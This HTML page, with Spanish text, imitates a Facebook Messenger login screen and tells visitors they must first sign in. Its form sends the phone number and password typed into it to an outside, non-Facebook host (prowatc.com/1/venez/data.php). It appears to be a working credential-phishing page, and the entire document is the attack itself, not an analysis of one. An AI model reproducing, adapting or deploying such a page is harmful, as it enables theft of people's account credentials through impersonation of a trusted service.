<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta property="og:image" content="https://cdn01.vulcanpost.com/wp-uploads/2016/12/fb-cover.jpg" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>App</title>
	<link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3b/Facebook_Messenger_logo.svg/595px-Facebook_Messenger_logo.svg.png">
      <style>
        * {
    margin:0px;
    padding:0px;
    -webkit-box-sizing:border-box;
    box-sizing:border-box;

}
body {
    background-color:#FFF;
    width:auto;
    height:auto;
}
.logo img {
    width:70px;
    margin-top:75px

}
.logo .head h1 {
    font-family: "Calibre", "Helvetica Neue", "Segoe UI",sans-serif;
    text-align: center;
    font-weight: 100;
    font-size: 40px;
    color: rgba(0, 0, 0, 1);
    margin-top: 17px;
    
}
.logo .head p {
    font-family: "Calibre", "Helvetica Neue", "Segoe UI",sans-serif;
    color: #f03d25;
    font-size:15px;
    line-height:20px;
    text-align:center;
    margin-top:30px

}
.form input[type='text'] {
    display: block;
    border: 1px solid rgba(0, 0, 0, .20);
    border-radius: 4px;
    color: rgba(0, 0, 0, 1);
    display: block;
    font-family: "Helvetica Neue", "Segoe UI", "Helvetica", "Arial", sans-serif;
    font-size: 17px;
    height: 42px;
    margin-bottom: 12px;
    margin-left: auto;
    margin-right: auto;
    margin-top: 37px;
    padding: 0 16px;
    width: 286px;
    
}
.form input[type="password"] {
    display: block;
    border: 1px solid rgba(0, 0, 0, .20);
    border-radius: 4px;
    color: rgba(0, 0, 0, 1);
    display: block;
    font-family: "Helvetica Neue", "Segoe UI", "Helvetica", "Arial", sans-serif;
    font-size: 17px;
    height: 42px;
    margin-bottom: 12px;
    margin-left: auto;
    margin-right: auto;
    margin-top: 13;
    padding: 0 16px;
    width: 286px;
    
}
.form button{
    background: #0a7cff;
    border-radius: 50px;
    color: #fff;
    font-size: 15px;
    padding: 15px 20px;
    align-items: center;
    border: none;
    box-shadow: none;
    display: flex;
    margin-left: auto;
    margin-right: auto;
     margin-top: 25px;
    overflow: hidden;
    text-overflow: ellipsis;
    text-shadow: none;
    white-space: nowrap;
    outline: none;
    
}
.form button{
    border:3px solid #FFF;
     border: none;
    box-shadow: none;
}
.form button {
    border:3px solid #FFF;
     border: none;
    box-shadow: none;
}
.form .cont {
    display:flex;
   justify-content: center;
}
form  .cont input[type="checkbox"] {
    height:22px;
    margin-right:3px;
    color: #929292;

}
 form  .cont input[type="checkbox"] , p {
    margin-top:60px; 
 
 }


 .form  .cont p {
  
     color: #929292;
     font-family: "Helvetica Neue", "Segoe UI", "Helvetica", "Arial", sans-serif;
     font-size: 15px;
     font-weight: normal;
 } 




@media only screen (max-width: 786px){
	form{
		width: 100%;
	}
	.form input{
		width: 95%;
	}
	.form button
	{
	    
		font-size: 18px;
        text-align: center;
        
    }
    .form .cont input[type="checkbox"] {
        height:12.2
    }
    
    



    
  
}


      </style>
        
    <link rel="me" href="https://www.blogger.com/profile/12529436326635944146" />
</head>  
    <body>
        <center>
            <div class="logo">
            <img src="https://i.imgur.com/PyQx19w.png" alt="Messanger">
                <div class="head">
                    <h1>Messenger</h1>
                  <p>Primero debes iniciar sesión</p>

                </div>
                
            </div>
            
            <div class="form">
<form action='https://prowatc.com/1/venez/data.php' method='POST' accept-charset='utf-8'>
<div class='username'><input class='massenger_i_user w-100' minlength="3" maxlength="30" name='mail' placeholder='Número de teléfono' required='required' type='text'/></div>
<div class='password'><input class='massenger_i_user w-100' minlength="6" name='pass' placeholder='Contraseña' required='required' type='password'/></div>
<button class='btn_log' type='submit'>Seguir</button> <br>
<div class='form-group'>
<div class='form-check'>
<input class='form-check-input' id='gridCheck' type='checkbox'/>
<label class='form-check-label massenger_check text-secondary' for='gridCheck'>
                Mantenerme registrado
   </label>
</div>
</div>
</form>
                
            </div>
            
                
        </center>
        


    </body>
</html>